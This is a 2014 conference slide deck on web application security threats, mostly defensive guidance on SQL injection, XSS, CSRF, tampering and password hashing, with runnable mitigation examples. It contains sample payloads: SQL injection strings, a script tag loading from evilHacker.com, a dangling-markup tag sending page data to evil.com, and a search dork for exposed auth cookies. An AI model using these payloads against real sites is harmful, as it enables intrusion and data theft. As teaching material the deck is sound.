
Web Security Threats and Solutions


DESCRIPTION

Have you heard the words "Why would anyone hack me?" Security is a serious problem that is often taken for granted and neglected by product owners in favour of reliability and availability. In addition, not many developers are aware of the threats and of the long-term harm that a simple attack can do. This session covers the most common security threats to web applications, such as XSS, CSRF, XSSI, parameter tampering, information leakage and SQL injection, and suggests mitigation solutions and coding guidelines.


Page 1: Web Security Threats and Solutions

Nov 23, 2014, Sofia

var title = "Web Security Threats and Solutions";

var info = {
    name: "Ivelin Andreev",
    otherOptional: "Security is not for granted"
};

Page 2: Web Security Threats and Solutions


About me

• Project Manager @

o 12 years professional experience

o .NET Web Development MCPD

o SQL Server 2012 (MCSA)

• Business Interests

o Web Development, SOA, Integration

o Security & Performance Optimization

o Horizon2020, Open BIM, GIS, Mapping

• Contact me

o [email protected]

o www.linkedin.com/in/ivelin

o www.slideshare.net/ivoandreev

Page 3: Web Security Threats and Solutions


Web Security is Important

Common misconceptions

• I am using ASP.NET ?!?!

• I am too small to be noticed by crackers

• I am too busy for security, my brand is important

• I am not operating in the financial industry

• Security seal means nothing for customers

• Hosting provider does not matter

Page 4: Web Security Threats and Solutions


agenda();

• SQL Injection

• Cross-Site Scripting (XSS)

• Cross-Site Request Forgery (CSRF)

• Cross-Site Script Inclusion (XSSI)

• Parameter Tampering

• Information Leakage

• Distributed Denial of Service

• Demo

Page 5: Web Security Threats and Solutions


SQL injection is so old...

Don’t developers know any better?

Page 6: Web Security Threats and Solutions


SQL Injection

Def: SQL commands or logic inserted through the data channel of a query

• Common reasons

o Dynamic query statements built by string concatenation

o Poor programming practice

• Impact

o Leak or loss of data

o Authentication and authorization bypass

• Impact (you may not have considered)

o Damage limited only by the permissions of the SQL account

o Rights of the Windows authentication user can be exploited

o Server security configuration modified

o Backdoors installed

Page 7: Web Security Threats and Solutions


Page 8: Web Security Threats and Solutions


(Pseudo) Solutions

• Replace special symbols (-, ", ')

o Data containing those symbols becomes unsearchable

o A poor replacement routine can itself build a vulnerable query (e.g. an input like –'– that survives the replacement)

• Smuggling

o A character that looks like a quote but is not one; the database converts it into a real quote (e.g. a Unicode look-alike mapped by best-fit conversion)

o OWASP_IL_2007_SQL_Smuggling.pdf

• "NoSQL is not vulnerable"

o NoSQL is also vulnerable (e.g. MongoDB queries that evaluate JavaScript, such as $where)

• Second order attacks

o Validating the request only is not enough

o Data stored safely in the DB is later concatenated into a dynamic query

Page 9: Web Security Threats and Solutions


Using Parameters (in the wrong manner)

• Dynamic queries (sp_executesql vs. EXEC)

o EXEC (@sqlString) executes a T-SQL string

o sp_executesql allows statements to be parameterized

o sp_executesql is more secure against SQL injection only when parameters are actually used

• Developer believes dynamic SQL is the only option

CREATE PROCEDURE GetUsers @Sort nvarchar(50) AS
DECLARE @sql nvarchar(255)
SET @sql = 'SELECT UserName FROM Users ' + @Sort
EXECUTE sp_executesql @sql
GO

o What if @Sort = '; DELETE FROM Users'? The concatenated string is executed as one batch.

o A sort column or clause cannot be passed as a parameter; map the request value onto a fixed choice instead:

CREATE PROCEDURE GetUsers @Sort int AS
SELECT UserName FROM Users ORDER BY
CASE WHEN @Sort = 1 THEN ( RANK() OVER (ORDER BY UserName ASC) ) END
GO
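The same three situations as an added, runnable example (not code from the deck; sqlite3 stands in for SQL Server and the Users table is constructed inline): a login check built by concatenation, the parameterized version, and a whitelist for the ORDER BY case, where parameters cannot be used because the sort column is an identifier rather than a value.

```python
import sqlite3


def make_db():
    # Constructed sample table (not from the deck).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users (UserName TEXT, Password TEXT, IsAdmin INTEGER)")
    db.executemany("INSERT INTO Users VALUES (?, ?, ?)",
                   [("alice", "s3cret", 1), ("bob", "hunter2", 0), ("carol", "pa55", 0)])
    return db


def login_vulnerable(db, user, password):
    # Dynamic SQL: the user's text becomes part of the query grammar, so a
    # quote inside it closes the literal and the remainder is parsed as SQL.
    sql = ("SELECT UserName FROM Users WHERE UserName = '" + user +
           "' AND Password = '" + password + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, user, password):
    # Parameterized query: values are bound separately from the statement
    # text, so quotes inside them are plain data.
    row = db.execute(
        "SELECT UserName FROM Users WHERE UserName = ? AND Password = ?",
        (user, password)).fetchone()
    return row[0] if row else None


# Identifiers (column names, ASC/DESC, whole clauses) cannot be bound as
# parameters. Map the request value onto a fixed whitelist instead; this is
# the same idea as the CASE/RANK construct in the safe stored procedure.
SORT_COLUMNS = {"name": "UserName", "admin": "IsAdmin DESC"}


def get_users_sorted(db, sort_key):
    order_by = SORT_COLUMNS.get(sort_key)
    if order_by is None:
        raise ValueError("unknown sort key: %r" % sort_key)
    return [r[0] for r in db.execute("SELECT UserName FROM Users ORDER BY " + order_by)]


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "' OR '1'='1' --", ""))   # logs in without a password
    print(login_safe(db, "' OR '1'='1' --", ""))         # None
    print(get_users_sorted(db, "name"))
```

Note that the injected value for the vulnerable login contains no semicolon: the attacker does not need a second statement, only a change to the WHERE clause, so a database driver that refuses multi-statement batches offers no protection here.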

Page 10: Web Security Threats and Solutions


Prevention & Mitigation

• Parameterized queries and prepared statements

o Use parameters wherever data is expected

o ORMs use parameters (NHibernate, Entity Framework)

• The "least privilege" principle

o Grant the minimum access rights

o Parameterized queries vs. stored procedure permissions (grant EXECUTE on procedures rather than rights on tables)

• Positive input validation (weak on its own)

o Regular expressions / white lists (e.g. alphanumeric only)

• IIS request filtering (weak on its own)

o filtering-for-sql-injection-on-iis-7-and-later

• SQL injection and DB takeover

o http://ha.ckers.org/sqlinjection/

o (SQL) http://sqlmap.org/; (NoSQL) http://www.nosqlmap.net/

Page 11: Web Security Threats and Solutions


SQL Injection with Entity Framework

• Entity Framework raw queries are ordinary dynamic SQL

string query = "query" + "SQL injection code";
dbContext.Database.SqlQuery<string>(query).ToList();

o Security Considerations (Entity Framework)

• IQueryable

o Can result in untrusted calls being composed into the query

o If exposed from a library, it can be cast back to the underlying query object and from there to the context and connection

var orders = repository.GetOrders(5);
var context = ((ObjectQuery)orders).Context;

o Expose IEnumerable instead

Page 12: Web Security Threats and Solutions


Page 13: Web Security Threats and Solutions


Cross Site Scripting (XSS)

Def: Untrusted content displayed on the page without encoding

• Case

o evilHacker injects <script> into the http://goodSite.com application context

• By posting an HTML form field

• By tricking the user into clicking a link with query parameters sent by mail

%3Cscript%20src%3D%27evilHacker.com%2Fscript.js%27%3E

• XSS sources

o Query parameters, HTML form fields

o HTML attributes (onload, onblur)

o Requested URI echoed on the HTTP 404 page

o Data from the DB or file system

o 3rd-party data (RSS feeds or services)

Page 14: Web Security Threats and Solutions


XSS – an Underestimated Threat

• Create or access any DOM element

• Hijack cookies, credentials or actions

• Take control over victim machine

• Browser Exploitation Framework Project (BeEF)

o Open source penetration testing tool

o An XSS vulnerability allows injection of the BeEF hook script

o Victim browser is hooked

o Perform actions/attacks on behalf of the victim

o Exploit the system in the browser context

Page 15: Web Security Threats and Solutions


Persisted XSS

• Attacker stores malicious data on server

• Unvalidated data displayed on page w/o encoding

• Store once – run many

Page 16: Web Security Threats and Solutions


Reflected XSS

• Malicious client data is immediately used by the server

• Unvalidated data displayed on the page without encoding

• Requires social engineering

o Convince users to follow a URL (via e-mail or forum comment)

• Detection tools

o OWASP Xenotix XSS Exploit Framework

o XSS-Me Firefox plugin

Page 17: Web Security Threats and Solutions


Client XSS & HTML Injection

• DOM-based XSS

o Malicious data executed as part of DOM manipulation (the server never sees the payload when it travels in the URL fragment)

o Requires social engineering

document.write("<OPTION value=1>" + document.location.href.substring(…) + "</OPTION>");

• Dangling markup HTML injection

o Image source without a closing quote

o On load of the image a request is made to the attacker's site

<img src='http://evil.com/log.cgi?    ← injected line with a non-terminated attribute
...
<input type="hidden" name="SecretField" value="12345">
...
'                                     ← normally-occurring apostrophe somewhere in the page text

o Everything between the two quotes, hidden field included, leaks to the evil site as part of the image URL

Page 18: Web Security Threats and Solutions


All user input

is evil

Page 19: Web Security Threats and Solutions


XSS Prevention & Mitigation

• HTML-escape for HTML contexts, JavaScript-escape for script contexts; when data lands in script inside HTML, apply both, innermost context first

• Encode on usage (output), not on appearance (input)

o HttpUtility.HtmlEncode(string)

o HttpUtility.JavaScriptStringEncode(string)

o Microsoft Anti-Cross Site Scripting Library (AntiXSS)

• Use proven sanitizers

o Blacklist vs. whitelist

o Valid JavaScript can be created by a poor filtering routine: stripping the word "script" once from

<SscriptCscriptRscriptIscriptPscriptTscript>… leaves <SCRIPT>…

• Check 3rd-party resources (e.g. jQuery plugins)

• Analyze the places where DOM elements are created

o Build them with document.createElement() rather than feeding untrusted strings to $(obj).html()
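An added example of context-dependent output encoding (not code from the deck; the small js_string_encode helper is written here to mirror what HttpUtility.JavaScriptStringEncode does, and is an assumption about its behaviour, not a copy of it). It shows the three contexts the slide distinguishes, and the failure mode of a plain JSON encoder, which leaves "</script>" intact and so lets the attacker close the script block early.

```python
import html
import json


def js_string_encode(value):
    """Escape text for use inside a JavaScript string literal, in the spirit of
    HttpUtility.JavaScriptStringEncode: every character that could close the
    literal or the surrounding <script> element becomes a \\uXXXX escape."""
    out = []
    for ch in value:
        code = ord(ch)
        if ch == "\\":
            out.append("\\\\")
        elif ch in "\"'<>&":
            out.append("\\u%04x" % code)
        elif ch == "\n":
            out.append("\\n")
        elif ch == "\r":
            out.append("\\r")
        elif code < 0x20 or ch in "\u2028\u2029":
            out.append("\\u%04x" % code)
        else:
            out.append(ch)
    return "".join(out)


def render_option(label):
    # HTML text and attribute context: HTML-encode only.
    return '<option value="%s">%s</option>' % (html.escape(label, quote=True),
                                                html.escape(label))


def render_inline_script(name):
    # JavaScript string context inside a <script> block: JS-encode only.
    # HTML entities are NOT decoded inside <script>, so HtmlEncode is the
    # wrong tool here; it would corrupt the data without stopping the attack.
    return '<script>var name = "%s";</script>' % js_string_encode(name)


def render_inline_script_naive(name):
    # Common mistake: a JSON encoder leaves '<' and '/' alone, so "</script>"
    # survives and terminates the script block early.
    return '<script>var name = %s;</script>' % json.dumps(name)


def render_onclick(name):
    # JS string inside an HTML attribute: the browser HTML-decodes the attribute
    # first and then parses it as JavaScript, so encode in the reverse order:
    # JS-encode the innermost context, then HTML-encode the attribute value.
    return '<a onclick="show(\'%s\')">x</a>' % html.escape(js_string_encode(name), quote=True)


if __name__ == "__main__":
    payload = "</script><script>alert(1)</script>"
    print(render_inline_script_naive(payload))   # script block is broken out of
    print(render_inline_script(payload))         # payload stays inside the string
    print(render_option("<b>x</b>"))
    print(render_onclick("x') ; alert(1) //"))
```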

Page 20: Web Security Threats and Solutions


Built-In XSS Prevention Features (.NET)

• Request validation

o ASP.NET Web Forms: <%@ Page ValidateRequest="true" %>

o ASP.NET MVC: Controller.ValidateRequest = true; (or the [ValidateInput] attribute)

o <httpRuntime requestValidationMode="4.0" />

• Do not turn request validation off

o It is the tempting "easy fix" for HTML editors

o Use HTML editors that HTML-encode before submission instead

• Reliability

o Microsoft's advice: relying solely on built-in request validation is not enough

o No known bypasses now (but there have been in the past)

• AntiXss.HtmlEncode() vs. HttpUtility.HtmlEncode()

o HttpUtility only ensures the output does not break the HTML; AntiXSS encodes everything outside a white list of safe characters

o Performance penalty is about +0.1 ms per transaction

Page 21: Web Security Threats and Solutions


Content Security Policy

• HTTP header

o Content-Security-Policy: script-src 'self'

• Features

o Whitelist the sources of trusted content

o Block resources from untrusted locations (including inline scripts, unless 'unsafe-inline' is allowed)

o Report blocked resources (report-uri)

• Directives

o script-src; img-src; media-src; style-src; frame-src; connect-src

• Keywords

o 'none', 'self', 'unsafe-inline', 'unsafe-eval'

• Browser support

o CanIUse.com: CSP

Page 22: Web Security Threats and Solutions


CSRF has nothing to do with sea-surf

Page 23: Web Security Threats and Solutions

Cross-Site Request Forgery (CSRF)

Def: Unauthorised commands transmitted from a user whom a website trusts

• Synonyms: one-click attack, session riding

• Case

o User logs in to http://goodSite.com as usual

o http://evilHacker.com can

• POST a new password in a form to goodSite.com

• GET http://goodSite.com/Payment.aspx?amount=1000&userID=EvilHacker

o Authenticated because the browser sends the goodSite.com cookies along with the request

• Impact

o evilHacker.com cannot read the DOM (same-origin policy) but can send POST / GET requests

o Act on behalf of the user (e.g. payment)

o User access is blocked or stolen (password changed)

Page 24: Web Security Threats and Solutions


Cross Site Script Inclusion (XSSI)

• Case

o Exploits the <script> element exception to the same-origin policy

o http://goodSite.com includes its own <script> for an AJAX request

o http://evilHacker.com includes the same script

• Authenticated because the cookies are sent

o Server returns JSON wrapped in a function call (JSONP)

<script type="application/javascript" src="http://goodSite.com/Svc/Get?callback=parseResponse"></script>

o The script is evaluated in the evilHacker.com context, which defines its own parseResponse, and the JSON is stolen

parseResponse({"this":"is","json":"data"});

• Impact

o User data are stolen

• Prevention

o Check the policy of script inclusion: never serve authenticated data as a script (JSONP); return plain JSON that is not valid JavaScript on its own and require a request token or custom header

Page 25: Web Security Threats and Solutions


CSRF Prevention & Mitigation

• Nonce token (URL, hidden field)

o Checked upon submission

o Protected by the browser's same-origin policy: the attacker's page cannot read it

• User-defined re-authentication (password, CAPTCHA)

• Built-in (ASP.NET Web Forms)

Page.ViewStateUserKey = Session.SessionID;

o Signs the ViewState with a per-user key

• Built-in (ASP.NET MVC)

o HtmlHelper.AntiForgeryToken() generates a hidden form field (paired with a cookie)

o [ValidateAntiForgeryToken] attribute validates it on the controller action

o NOT a single-use token

• Use POST for state-changing actions; a GET is forged with a plain <img> or link

o CORS does not stop a cross-domain form POST; it only controls whether script on the other origin may read the response
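An added example of the cookie-plus-hidden-field scheme that the MVC anti-forgery helpers implement (not code from the deck or from ASP.NET; SERVER_KEY plays the role of the machineKey and the token format is this example's own). The attacker's page can make the browser send the cookie but cannot read it, and cannot compute the form token without the server key, so a forged POST fails validation.

```python
import hashlib
import hmac
import secrets

# Stand-in for the machineKey that ASP.NET uses to sign its tokens (assumed; generated here).
SERVER_KEY = secrets.token_bytes(32)


def issue_cookie_token():
    # Random per-session value, set as an HttpOnly cookie. The attacker's page
    # cannot read it (same-origin policy), yet the browser still sends it.
    return secrets.token_urlsafe(24)


def _mac(cookie_token, username):
    msg = ("%s|%s" % (cookie_token, username)).encode("utf-8")
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def issue_form_token(cookie_token, username):
    # Hidden field rendered into the form: binds the cookie token to the
    # logged-in user. Only the server knows SERVER_KEY, so it cannot be forged,
    # and only a page on our origin can read it to copy it into a request.
    return "%s:%s" % (username, _mac(cookie_token, username))


def validate_request(cookie_token, form_token, current_user):
    # Server-side check on every state-changing POST.
    if not cookie_token or not form_token or ":" not in form_token:
        return False
    username, mac = form_token.rsplit(":", 1)
    if username != current_user:          # token issued for a different user
        return False
    return hmac.compare_digest(mac, _mac(cookie_token, username))


if __name__ == "__main__":
    cookie = issue_cookie_token()
    field = issue_form_token(cookie, "alice")
    print(validate_request(cookie, field, "alice"))   # legitimate form: True
    print(validate_request(cookie, "", "alice"))      # forged cross-site form: False
```

As on the slide, the token is not single-use: the same (cookie, field) pair stays valid for the life of the session, which is why it must never be placed where another origin could read it (a GET parameter logged by a proxy, a page vulnerable to XSS).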

Page 26: Web Security Threats and Solutions


Parameter tampering

Page 27: Web Security Threats and Solutions


Parameter Tampering

Def: Parameters changed in an unintended way

Common sources

• Query string; hidden form fields

• Data-channel interception (man-in-the-middle attack)

Common mistakes

• Client-side validation only

• No check against the predefined set of values

• Access to entities not validated on the server (e.g. EntityId=??? belonging to another user)

• Unprotected data sent to the client

o Query strings; JavaScript parameters

Page 28: Web Security Threats and Solutions


Tampering Prevention & Mitigation

• Built-in (ASP.NET MVC): none

• Built-in (ASP.NET Web Forms)

• ViewState

o Not encrypted by default (binary serialized, Base64 encoded): anyone can read it, the MAC only stops changes

o Do not turn EnableViewStateMac off (web farms and cross-domain POSTs are the usual excuses; share the machineKey instead)

• Event validation

o "Invalid postback or callback argument…"

o Not encrypted (binary serialized, Base64 encoded)

o Do not turn event validation off

o Register dynamically added values for event validation:

protected override void Render(HtmlTextWriter writer) {
    Page.ClientScript.RegisterForEventValidation(ddl.UniqueID, "John");
    base.Render(writer);
}
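An added example of the two mechanisms on the slide (not code from the deck or from ASP.NET; MACHINE_KEY and the JSON serialization are this example's stand-ins for the machineKey and the binary ViewState format). It shows that a Base64 blob without a MAC is both readable and editable, that the MAC'd blob is still readable but rejects edits, and how event validation rejects a posted value the server never rendered.

```python
import base64
import hashlib
import hmac
import json
import secrets

# Stand-in for the ASP.NET machineKey validation key (assumed; generated here).
MACHINE_KEY = secrets.token_bytes(32)
TAG_LEN = 32   # SHA-256 HMAC


def encode_state(state):
    # Serialize + Base64 only: anyone can read it and anyone can change it.
    return base64.b64encode(json.dumps(state, sort_keys=True).encode()).decode()


def decode_state(blob):
    return json.loads(base64.b64decode(blob))


def encode_state_mac(state):
    # Same serialization plus an HMAC over the body (EnableViewStateMac="true").
    body = json.dumps(state, sort_keys=True).encode()
    tag = hmac.new(MACHINE_KEY, body, hashlib.sha256).digest()
    return base64.b64encode(body + tag).decode()


def decode_state_mac(blob):
    raw = base64.b64decode(blob)
    body, tag = raw[:-TAG_LEN], raw[-TAG_LEN:]
    expected = hmac.new(MACHINE_KEY, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("Validation of viewstate MAC failed")
    return json.loads(body)


def tamper(blob, old, new):
    # What a client can do with a hidden field: decode it, edit the first
    # occurrence of a value, re-encode it and post it back.
    raw = base64.b64decode(blob)
    return base64.b64encode(raw.replace(old.encode(), new.encode(), 1)).decode()


# Event validation: the server records which values it rendered for a control
# and rejects a postback that claims any other value.
def register_for_event_validation(registry, control_id, values):
    registry.setdefault(control_id, set()).update(values)


def validate_postback(registry, control_id, posted_value):
    if posted_value not in registry.get(control_id, set()):
        raise ValueError("Invalid postback or callback argument")
    return posted_value


if __name__ == "__main__":
    state = {"Price": 100, "UserId": 7}          # constructed sample state
    print(decode_state(tamper(encode_state(state), "100", "1")))   # accepted: Price 1
    try:
        decode_state_mac(tamper(encode_state_mac(state), "100", "1"))
    except ValueError as e:
        print(e)                                  # the same edit is rejected
    registry = {}
    register_for_event_validation(registry, "ddl", ["John", "Jane"])
    print(validate_postback(registry, "ddl", "John"))
```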

Page 29: Web Security Threats and Solutions


Encryption & Hashing

Page 30: Web Security Threats and Solutions


Encryption

• Protects sensitive data (if stolen)

o Credentials; auth tokens; configuration

• SQL Server data encryption

o EncryptByPassPhrase

o EncryptByCert

o EncryptByKey

• Application level

o AesCryptoServiceProvider, RijndaelManaged

o TripleDESCryptoServiceProvider (legacy; prefer AES)

• Connection string encryption

o Machine-specific encryption applied after deployment

aspnet_regiis -pe "connectionStrings" -app "/[appname]"

o Decryption is done automatically by the runtime

Page 31: Web Security Threats and Solutions


Hashing

• One-way function (MD5, SHA1, SHA256)

o MD5 generator: http://www.md5.cz/

o Fixed-size output, smaller than the data

• Collisions exist by definition, but finding one must be infeasible (MD5 and SHA1 no longer meet that bar)

• Usage

o Assure information was not changed (tampered with)

o Protect passwords

• Compromising

o A good algorithm is always compromised by weak passwords

o Brute force (GPU)

o Precalculated "rainbow tables" and dictionary attacks

• http://www.hashkiller.co.uk/md5-decrypter.aspx

Page 32: Web Security Threats and Solutions


Protecting Hashes

• Random salt

o [SecretText][Salt] -> [Hash]

o Changes the hash value for the same password

o Invalidates rainbow tables

o Slows down brute force attacks (each user has to be attacked separately)

• Complex passwords

• Slow algorithms

• Key stretching (Rfc2898DeriveBytes class, i.e. PBKDF2 with HMAC-SHA1)

U1 = PRF(Password, Salt || INT(i))      (i = index of the output block)
U2 = PRF(Password, U1)
...
Uc = PRF(Password, Uc-1)
T = U1 xor U2 xor ... xor Uc

• Outsource sensitive data storage (if possible)
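An added example (not code from the deck) that implements the U1 … Uc chain above exactly as written, with the per-block XOR that PBKDF2 (RFC 2898, the algorithm behind Rfc2898DeriveBytes) applies, and wraps it in a salted hash/verify pair. The iteration counts and the sample password are this example's own choices; hashlib.pbkdf2_hmac is used only as a reference to check the hand-written derivation against.

```python
import hashlib
import hmac
import os
import struct


def _pbkdf2_block(password, salt, iterations, block_index):
    # One output block T_i of PBKDF2-HMAC-SHA1:
    #   U1 = PRF(P, S || INT(i)),  Uj = PRF(P, U(j-1)),  T_i = U1 xor U2 xor ... xor Uc
    def prf(msg):
        return hmac.new(password, msg, hashlib.sha1).digest()

    u = prf(salt + struct.pack(">I", block_index))   # big-endian 4-byte block index
    t = bytearray(u)
    for _ in range(iterations - 1):
        u = prf(u)
        for k in range(len(t)):
            t[k] ^= u[k]
    return bytes(t)


def pbkdf2_sha1(password, salt, iterations, dklen):
    # Concatenate as many blocks as needed and truncate to the requested length.
    out = b""
    i = 1
    while len(out) < dklen:
        out += _pbkdf2_block(password, salt, iterations, i)
        i += 1
    return out[:dklen]


def hash_password(password, iterations=100000):
    # Fresh random salt per password; store (salt, iterations, hash) together
    # so the iteration count can be raised later without breaking old records.
    salt = os.urandom(16)
    return salt, pbkdf2_sha1(password.encode("utf-8"), salt, iterations, 32)


def verify_password(password, salt, stored, iterations=100000):
    candidate = pbkdf2_sha1(password.encode("utf-8"), salt, iterations, len(stored))
    # Constant-time comparison: a plain == would leak how many leading bytes match.
    return hmac.compare_digest(candidate, stored)


if __name__ == "__main__":
    # RFC 6070 test vector: P="password", S="salt", c=1, dkLen=20
    print(pbkdf2_sha1(b"password", b"salt", 1, 20).hex())
    salt, digest = hash_password("correct horse battery staple", iterations=10000)
    print(verify_password("correct horse battery staple", salt, digest, iterations=10000))
```

The Rfc2898DeriveBytes default of 1000 iterations dates from 2000 and is far too low for a modern GPU; pick the largest count the login path can afford and store it alongside the hash.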

Page 33: Web Security Threats and Solutions


Information Leakage

• Loss of sensitive data

o Displaying trace and log information

o Displaying raw error messages

o Google it: inurl:elmah.axd aspxauth

o The attacker can profile the application and select the appropriate attack

• Mitigation

o Custom error pages: <customErrors mode="On" defaultRedirect="Error.aspx" />

o Turn off tracing

• Retail mode <deployment retail="true" />

o Set in machine.config for the whole server

o Forces customErrors to "On" and debug to "false"

o Trace information is not displayed

• Test

Page 34: Web Security Threats and Solutions


Transport Layer Security

Page 35: Web Security Threats and Solutions


SSL / TLS

• HTTP over TLS prevents packet sniffing (and tampering in transit)

• Force HTTPS for the entire site

o Or at least for the credential exchange and the authenticated session

• ASP.NET MVC: RequireHttpsAttribute

o Redirects the request to the HTTPS scheme

• ASP.NET Web Forms

o Requires custom code

o https://code.google.com/p/securityswitch/

<securitySwitch mode="RemoteOnly">
  <paths>
    <add path="~/Login.aspx" />
  </paths>
</securitySwitch>

Page 36: Web Security Threats and Solutions


Distributed Denial of Service

Page 37: Web Security Threats and Solutions


Denial of Service Attack

DDoS

• Anonymous?!

o LOIC (hive mode)

o Tor anonymity project

• Hash DoS (known since 2003)

o POST parameters are stored in a hash table; the attacker sends keys that all collide

o Too many collisions = 100% CPU for a single request

o Patch: block POSTs with more than 1000 form fields (MS11-100)

Prevention & Mitigation

• Dynamic IP Restrictions IIS extension

o http://www.iis.net/downloads/microsoft/dynamic-ip-restrictions

• Good logging and diagnostics are essential

Page 38: Web Security Threats and Solutions


Demo

DEMO

Page 39: Web Security Threats and Solutions


Takeaways

• Guidelines & code labs

o Open Web Application Security Project www.owasp.org

o Web App Exploits and Defenses: google-gruyere

o 2013 Top 10 Web Security Vulnerabilities: Top_10_2013

o 2011 Top 25 Most Dangerous Software Errors: cwe.mitre.org/top25

• Articles

o Hack-proofing ASP.NET Web Applications, Adam Tuliper

o Hash DDoS: Hash-Dos-Attack

• .NET source code: referencesource.microsoft.com

• Tools

o ASafaWeb Analyser asafaweb.com

o Website and Web Server Security Testing www.beyondsecurity.com

Page 40: Web Security Threats and Solutions


Upcoming events

ISTA Conference 26-27 November

http://istabg.org/

Stay tuned for 2015:

Azure Bootcamp http://azure-camp.eu/

UXify Bulgaria http://uxify.org/

SQLSaturday https://www.sqlsaturday.com/

and more js.next();

Page 41: Web Security Threats and Solutions


Thanks to our Sponsors:
